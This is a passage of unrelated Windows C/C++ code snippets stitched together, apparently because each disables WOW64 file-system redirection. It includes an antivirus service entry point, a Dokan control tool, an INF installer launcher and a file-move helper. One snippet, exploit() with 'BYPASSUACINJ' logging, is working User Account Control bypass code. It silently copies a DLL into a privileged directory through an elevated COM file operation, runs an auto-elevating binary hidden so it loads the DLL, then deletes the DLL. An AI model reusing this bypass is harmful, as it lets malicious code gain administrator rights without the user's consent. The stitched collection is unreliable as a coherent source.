Sort by dirs count (descending) SortList( &resultsList, cmpItemsDirsCount ); else if ( flags[ FL_MODIF ] ) // Sort by modification date (latest to earliest) SortList( &resultsList, cmpItemsLastWriteTime ); else if ( flags[ FL_NAME ] ) // Sort by name (a to Z) SortList( &resultsList, cmpItemsName ); else // Default: sort by size (descending) SortList( &resultsList, cmpItemsSizeCount ); // Debug output if ( flags[ FL_DBG ] ) wprintf_s( TEXT( "\n" ) ); // Display sorted results showResults( &resultsList, &resultsItem ); } // Housekeeping EmptyTheList( &resultsList ); // Fetch final ticks count QueryPerformanceCounter( &endingT ); // Calc elapsed ticks elapsedTicks.QuadPart = endingT.QuadPart - startingT.QuadPart; // Calc and display elapsed time calcDispElapTime( &elapsedTicks.QuadPart, &freq.QuadPart ); return 0; }
int main(int argc, char ** argv) { int ret = 0; struct a6o_report report = {0}; PVOID OldValue = NULL; if (argc >= 2 && strncmp(argv[1],"--conf",6) == 0 ) { // TODO :: https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms724072%28v=vs.85%29.aspx //conf_poc_windows( ); return 0; } // Only for test purposes (command line) if (argc >= 2 && strncmp(argv[1], "--disable_rt", 12) == 0) { //disable_onaccess( ); return EXIT_SUCCESS; } if (argc >= 2 && strncmp(argv[1], "--notify", 8) == 0) { a6o_notify_set_handler((a6o_notify_handler_t)send_notif); a6o_notify(NOTIF_INFO,"Service started!"); a6o_notify(NOTIF_WARNING,"Malware detected :: [%s]","TrojanFake"); a6o_notify(NOTIF_ERROR,"An error occured during scan !!"); return EXIT_SUCCESS; } // Only for test purposes (command line) complete test = GUI + driver. if ( argc >=2 && strncmp(argv[1],"--testGUI",9) == 0 ){ DisplayBanner(); a6o_notify_set_handler((a6o_notify_handler_t)send_notif); if (Wow64DisableWow64FsRedirection(&OldValue) == FALSE) { return -1; } /* (FD) added to get all log messages */ a6o_log_set_handler(ARMADITO_LOG_LEVEL_DEBUG, a6o_log_default_handler, NULL); ret = LaunchCmdLineService(GUI_ONLY); if (Wow64RevertWow64FsRedirection(OldValue) == FALSE ){ // Failure to re-enable redirection should be considered // a criticial failure and execution aborted. return -2; } if (ret < 0) { return EXIT_FAILURE; } return EXIT_SUCCESS; } // Only for test purposes (command line) complete test = GUI + driver. if ( argc >=2 && strncmp(argv[1],"--test",6) == 0 ){ DisplayBanner( ); a6o_notify_set_handler((a6o_notify_handler_t)send_notif); ret = LaunchCmdLineService(SVC_MODE); if (ret < 0) { return EXIT_FAILURE; } return EXIT_SUCCESS; } // Only for test purposes (command line) if ( argc >=2 && strncmp(argv[1],"--register",10) == 0 ){ #if 0 ret = register_av( ); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } // Only for test purposes (command line) if ( argc >=2 && strncmp(argv[1],"--crypt",7) == 0 ){ #if 0 if (argv[2] == NULL) { printf("[-] Error :: --crypt option :: missing parameter [filename]\n"); return EXIT_FAILURE; } ret = verify_file_signature(argv[2],SIGNATURE_FILE); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } // Only for test purposes (command line) if ( argc >=3 && strncmp(argv[1],"--quarantine",11) == 0 ){ #if 0 ret = MoveFileInQuarantine(argv[2], report); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--quarantine",11) == 0 ){ #if 0 ret = EnumQuarantine(); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--restore",9) == 0 ){ #if 0 ret = ui_restore_quarantine_file(argv[1]); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } if ( argc >=3 && strncmp(argv[1],"--restore",9) == 0 ){ #if 0 ret = RestoreFileFromQuarantine(argv[2]); if (ret < 0) { return EXIT_FAILURE; } #endif return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--updatedb",10) == 0 ){ DisplayBanner( ); update_modules_db(NULL); return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--info",6) == 0 ){ if (get_av_info() < 0) { return EXIT_FAILURE; } return EXIT_SUCCESS; } if (argc >= 2 && strncmp(argv[1], "--installboot", 13) == 0){ DisplayBanner(); ret = ServiceInstall(SERVICE_AUTO_START); if (ret < 0) { return EXIT_FAILURE; } return EXIT_SUCCESS; } // command line parameter "--install", install the service. if ( argc >=2 && strncmp(argv[1],"--install",9) == 0 ){ DisplayBanner( ); ret = ServiceInstall(SERVICE_DEMAND_START); if (ret < 0) { return EXIT_FAILURE; } return EXIT_SUCCESS; } // command line parameter "--uninstall", uninstall the service. if ( argc >=2 && strncmp(argv[1],"--uninstall",11) == 0 ){ DisplayBanner( ); ret = ServiceRemove( ); return EXIT_SUCCESS; } // command line parameter "--remove", delete the service. if ( argc >=2 && strncmp(argv[1],"--stop",6) == 0 ){ ServiceStop(); return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--start",7) == 0 ){ ServiceLaunch( ); return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--pause",7) == 0 ){ ServicePause( ); return EXIT_SUCCESS; } if ( argc >=2 && strncmp(argv[1],"--continue",10) == 0 ){ ServiceContinue( ); return EXIT_SUCCESS; } //ServiceLaunchAction( ); // put this part in ServiceLaunchAction function. SERVICE_TABLE_ENTRY DispatchTable[] = { { SVCNAME, (LPSERVICE_MAIN_FUNCTION) ServiceMain }, { NULL, NULL } }; // This call returs when the service has stopped. if (!StartServiceCtrlDispatcher(DispatchTable)) { //SvcReportEvent(TEXT("StartServiceCtrlDispatcher")); //printf("[i] StartServiceCtrlDispatcher :: %d\n",GetLastError()); } return EXIT_SUCCESS; }
void exploit(BypassUacPaths const * const paths) { const wchar_t *szElevArgs = L""; const wchar_t *szEIFOMoniker = NULL; PVOID OldValue = NULL; IFileOperation *pFileOp = NULL; IShellItem *pSHISource = 0; IShellItem *pSHIDestination = 0; IShellItem *pSHIDelete = 0; BOOL bComInitialised = FALSE; const IID *pIID_EIFO = &__uuidof(IFileOperation); const IID *pIID_EIFOClass = &__uuidof(FileOperation); const IID *pIID_ShellItem2 = &__uuidof(IShellItem2); dprintf("[BYPASSUACINJ] szElevDir = %S", paths->szElevDir); dprintf("[BYPASSUACINJ] szElevDirSysWow64 = %S", paths->szElevDirSysWow64); dprintf("[BYPASSUACINJ] szElevDll = %S", paths->szElevDll); dprintf("[BYPASSUACINJ] szElevDllFull = %S", paths->szElevDllFull); dprintf("[BYPASSUACINJ] szElevExeFull = %S", paths->szElevExeFull); dprintf("[BYPASSUACINJ] szDllTempPath = %S", paths->szDllTempPath); do { if (CoInitialize(NULL) != S_OK) { dprintf("[BYPASSUACINJ] Failed to initialize COM"); break; } bComInitialised = TRUE; if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**)&pFileOp) != S_OK) { dprintf("[BYPASSUACINJ] Couldn't create EIFO instance"); break; } if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK) { dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op."); break; } if (SHCreateItemFromParsingName((PCWSTR)paths->szDllTempPath, NULL, *pIID_ShellItem2, (void**)&pSHISource) != S_OK) { dprintf("[BYPASSUACINJ] Unable to create item from name (source)"); break; } if (SHCreateItemFromParsingName(paths->szElevDir, NULL, *pIID_ShellItem2, (void**)&pSHIDestination) != S_OK) { dprintf("[BYPASSUACINJ] Unable to create item from name (destination)"); break; } if (pFileOp->CopyItem(pSHISource, pSHIDestination, paths->szElevDll, NULL) != S_OK) { dprintf("[BYPASSUACINJ] Unable to prepare copy op for elev dll"); break; } /* Copy the DLL file to the target folder*/ if (pFileOp->PerformOperations() != S_OK) { dprintf("[BYPASSUACINJ] Unable to copy elev dll"); break; } /* Execute the target binary */ SHELLEXECUTEINFOW shinfo; ZeroMemory(&shinfo, sizeof(shinfo)); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; shinfo.lpFile = paths->szElevExeFull; shinfo.lpParameters = szElevArgs; shinfo.lpDirectory = paths->szElevDir; shinfo.nShow = SW_HIDE; Wow64DisableWow64FsRedirection(&OldValue); if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL) { WaitForSingleObject(shinfo.hProcess, 10000); CloseHandle(shinfo.hProcess); } if (S_OK != SHCreateItemFromParsingName(paths->szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete) || NULL == pSHIDelete) { dprintf("[BYPASSUACINJ] Failed to create item from parsing name (delete)"); break; } if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL)) { dprintf("[BYPASSUACINJ] Failed to prepare op for delete"); break; } if (pFileOp->PerformOperations() == S_OK) { dprintf("[BYPASSUACINJ] Successfully deleted dll"); // bail out this point because we don't need to keep trying to delete break; } SAFERELEASE(pSHIDelete); // If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path // DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see: // http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx if (S_OK != SHCreateItemFromParsingName(paths->szElevDirSysWow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete) || NULL == pSHIDelete) { dprintf("[BYPASSUACINJ] Failed to create item from parsing name for delete (shellitem2)"); break; } if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL)) { dprintf("[BYPASSUACINJ] Failed to prepare op for delete (shellitem2)"); break; } if (pFileOp->PerformOperations() == S_OK) { dprintf("[BYPASSUACINJ] Successfully deleted DLL in target directory from SYSWOW64 process"); } else { dprintf("[BYPASSUACINJ] Failed to delete target DLL"); } } while (0); SAFERELEASE(pSHIDelete); SAFERELEASE(pSHIDestination); SAFERELEASE(pSHISource); SAFERELEASE(pFileOp); if (bComInitialised) { CoUninitialize(); } }
int __cdecl wmain(int argc, PWCHAR argv[]) { size_t i; WCHAR fileName[MAX_PATH]; WCHAR driverFullPath[MAX_PATH] = {0}; WCHAR mounterFullPath[MAX_PATH] = {0}; WCHAR type; PVOID wow64OldValue; DokanUseStdErr(TRUE); // Set dokan library debug output Wow64DisableWow64FsRedirection(&wow64OldValue); //Disable system32 direct // setlocale(LC_ALL, ""); GetModuleFileName(NULL, fileName, MAX_PATH); // search the last "\" for (i = wcslen(fileName) - 1; i > 0 && fileName[i] != L'\\'; --i) { ; } fileName[i] = L'\0'; wcscpy_s(mounterFullPath, MAX_PATH, fileName); wcscat_s(mounterFullPath, MAX_PATH, L"\\mounter.exe"); fwprintf(stderr, L"Mounter path: '%s'\n", mounterFullPath); ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath, MAX_PATH); fwprintf(stderr, L"Driver path: '%s'\n", driverFullPath); if (GetOption(argc, argv, 1) == L'v') { fprintf(stderr, "dokanctl : %s %s\n", __DATE__, __TIME__); fprintf(stderr, "Dokan version : %d\n", DokanVersion()); fprintf(stderr, "Dokan driver version : 0x%lx\n", DokanDriverVersion()); return EXIT_SUCCESS; } else if (GetOption(argc, argv, 1) == L'm') { return ShowMountList(); } else if (GetOption(argc, argv, 1) == L'u' && argc == 3) { return Unmount(argv[2], FALSE); } else if (GetOption(argc, argv, 1) == L'u' && GetOption(argc, argv, 3) == L'f' && argc == 4) { return Unmount(argv[2], TRUE); } else if (argc < 3 || wcslen(argv[1]) != 2 || argv[1][0] != L'/') { return ShowUsage(); } type = towlower(argv[2][0]); switch (towlower(argv[1][1])) { case L'i': if (type == L'd') { return InstallDriver(driverFullPath); } else if (type == L's') { return InstallMounter(mounterFullPath); } else if (type == L'a') { if (InstallDriver(driverFullPath) == EXIT_FAILURE) return EXIT_FAILURE; if (InstallMounter(mounterFullPath) == EXIT_FAILURE) return EXIT_FAILURE; } else if (type == L'n') { if (DokanNetworkProviderInstall()) fprintf(stderr, "network provider install ok\n"); else fprintf(stderr, "network provider install failed\n"); } break; case L'r': if (type == L'd') { return DeleteDokanService(DOKAN_DRIVER_SERVICE); } else if (type == L's') { return DeleteDokanService(DOKAN_MOUNTER_SERVICE); } else if (type == L'a') { if (DeleteDokanService(DOKAN_MOUNTER_SERVICE) == EXIT_FAILURE) return EXIT_FAILURE; if (DeleteDokanService(DOKAN_DRIVER_SERVICE) == EXIT_FAILURE) return EXIT_FAILURE; } else if (type == L'n') { if (DokanNetworkProviderUninstall()) fprintf(stderr, "network provider remove ok\n"); else fprintf(stderr, "network provider remove failed\n"); } break; case L'd': if (L'0' <= type && type <= L'9') { ULONG mode = type - L'0'; if (DokanSetDebugMode(mode)) { fprintf(stderr, "set debug mode ok\n"); } else { fprintf(stderr, "set debug mode failed\n"); } } break; default: fprintf(stderr, "unknown option\n"); } return EXIT_SUCCESS; }
// we don't need any runtime initialization; only use Win32 API! void __cdecl WinMainCRTStartup(void) { // variable for ExitProcess UINT exitCode; // variables for Tokenize LPTSTR infName; // variables for GetFullPathName LPTSTR fullPath; LPTSTR filePart; // variables for lstrcpy, lstrcat DWORD len; LPTSTR fixCmd; LPTSTR argList; // variables for ShellExecuteEx SHELLEXECUTEINFO shExec; // variables for Wow64DisableWow64FsRedirection PVOID OldWow64FsRedirectionValue; // variables for VerifyVersionInfo OSVERSIONINFOEX verInfo; // declare these functions as pointers to load dynamically PW64DW64FR Wow64DisableWow64FsRedirection; PW64RW64FR Wow64RevertWow64FsRedirection; // attempt to load functions and store pointer in variable Wow64DisableWow64FsRedirection = (PW64DW64FR) GetProcAddress( GetModuleHandle(TEXT("kernel32.dll")), "Wow64DisableWow64FsRedirection"); Wow64RevertWow64FsRedirection = (PW64RW64FR) GetProcAddress( GetModuleHandle(TEXT("kernel32.dll")), "Wow64RevertWow64FsRedirection"); // get the command line buffer from the environment infName = Tokenize (GetCommandLine ()); // standard prefix to run an installer. first argument is a tuple of // the library name and the entry point; there must be a comma // between them and no spaces. rest of the command is passed to that // entry point. DefaultInstall is the name of the section, 128 is // flags, and the .inf name must be specified using a path to avoid // having it search for files in default directories. fixCmd = TEXT("setupapi.dll,InstallHinfSection DefaultInstall 128 "); // get canonical path of the argument len = GetFullPathName (infName, 0, NULL, NULL); // file does not exist? if (len == 0) { exitCode = 0xFE; goto cleanupFullPath; } fullPath = (LPTSTR) HeapAlloc (GetProcessHeap (), 0, (len+1) * sizeof(TCHAR)); GetFullPathName (infName, len, fullPath, &filePart); // only directory was specified if (*filePart == '\0') { exitCode = 0xFD; goto cleanupFullPath; } // put all portions together to a total command line. note that the // InstallHinfSection argument list is not a regular command line. there // are always three fields: Section (DefaultInstall), Flags (128) and // Path, which are separated with a space. No quotes should be put around // the path, nor is the short name really necessary (on Windows 7 64-bit // there may not be a short name version available). len = lstrlen (fixCmd) + lstrlen (fullPath); argList = (LPTSTR) HeapAlloc (GetProcessHeap (), 0, (len+1) * sizeof(TCHAR)); lstrcpy (argList, fixCmd); lstrcat (argList, fullPath); //MessageBox(NULL, argList, TEXT("argList"), MB_ICONINFORMATION | MB_OK); ZeroFill (&shExec, sizeof(SHELLEXECUTEINFO)); shExec.cbSize = sizeof(SHELLEXECUTEINFO); shExec.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_DDEWAIT | SEE_MASK_DOENVSUBST; // <http://codefromthe70s.org/vistatutorial.aspx> // <http://www.wintellect.com/cs/blogs/jrobbins/archive/2007/03/27/elevate-a-process-at-the-command-line-in-vista.aspx> ZeroFill (&verInfo, sizeof(OSVERSIONINFOEX)); verInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); verInfo.dwMajorVersion = 6; // Vista if (VerifyVersionInfo (&verInfo, VER_MAJORVERSION, VerSetConditionMask (0, VER_MAJORVERSION, VER_GREATER_EQUAL))) { shExec.lpVerb = TEXT("runas"); } // instead of calling InstallHinfSection ourself, we need to execute // the external program so that the native version (32- or 64-bits) // is run. it is always in system32, even on Windows x64! (folder // redirection is deactivated, so we'll get the native version). shExec.lpFile = TEXT("%SystemRoot%\\system32\\rundll32.exe"); shExec.lpParameters = argList; shExec.nShow = SW_SHOWDEFAULT; // only call the WoW64 functions if they are available on our system if(NULL != Wow64DisableWow64FsRedirection) Wow64DisableWow64FsRedirection (&OldWow64FsRedirectionValue); // launch process and "inherit" exit code ShellExecuteEx (&shExec); WaitForSingleObject (shExec.hProcess, INFINITE); GetExitCodeProcess (shExec.hProcess, &exitCode); CloseHandle (shExec.hProcess); if (NULL != Wow64RevertWow64FsRedirection) Wow64RevertWow64FsRedirection (OldWow64FsRedirectionValue); // not really necessary, but it's a habit hard to turn HeapFree (GetProcessHeap (), 0, argList); cleanupFullPath: HeapFree (GetProcessHeap (), 0, fullPath); ExitProcess (exitCode); }
BOOL CFileMove::MoveFile(LPCTSTR lpExistingFileName, LPCTSTR lpNewFileName, DWORD dwFlags) { if (lpExistingFileName == NULL) { ::SetLastError(ERROR_INVALID_PARAMETER); return FALSE; } // 去掉只读属性 RemoveReadonlyAttribute(lpExistingFileName); RemoveReadonlyAttribute(lpNewFileName); if (!m_bIsWow64) { return MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags); } TCHAR szSystemWow64[MAX_PATH] = {0}; if (!GetWow64Directory(szSystemWow64, countof(szSystemWow64))) { return FALSE; } TCHAR szSystem32[MAX_PATH] = {0}; if (!GetSystemDirectory(szSystem32, countof(szSystem32))) { return FALSE; } TCHAR szSysNative[MAX_PATH] = {0}; if (!GetWindowsDirectory(szSysNative, countof(szSysNative))) { return FALSE; } StringCchCat(szSysNative, countof(szSysNative), _T("\\Sysnative")); TCHAR szExistingFileName[MAX_PATH] = {0}; TCHAR szNewFileName[MAX_PATH] = {0}; TCHAR * pNewMoveFileName = NULL; RevertFsRedirection(lpExistingFileName, szSystem32, szSystemWow64, szExistingFileName, countof(szExistingFileName)); RevertFsRedirection(szExistingFileName, szSysNative, szSystem32, szExistingFileName, countof(szExistingFileName)); if (lpNewFileName != NULL) { RevertFsRedirection(lpNewFileName, szSystem32, szSystemWow64, szNewFileName, countof(szNewFileName)); RevertFsRedirection(szNewFileName, szSysNative, szSystem32, szNewFileName, countof(szNewFileName)); pNewMoveFileName = szNewFileName; } // 关闭32位程序在64位系统下的自动重定向功能 PVOID pOldValue = NULL; if (!Wow64DisableWow64FsRedirection(&pOldValue)) { return FALSE; } DWORD dwLastError = ERROR_SUCCESS; BOOL bMoveFile = MoveFileEx(szExistingFileName, pNewMoveFileName, dwFlags); if (!bMoveFile) { dwLastError = ::GetLastError(); } // 恢复32位程序在64位系统下的自动重定向功能 if (!Wow64RevertWow64FsRedirection(pOldValue)) { return FALSE; } ::SetLastError(dwLastError); return bMoveFile; }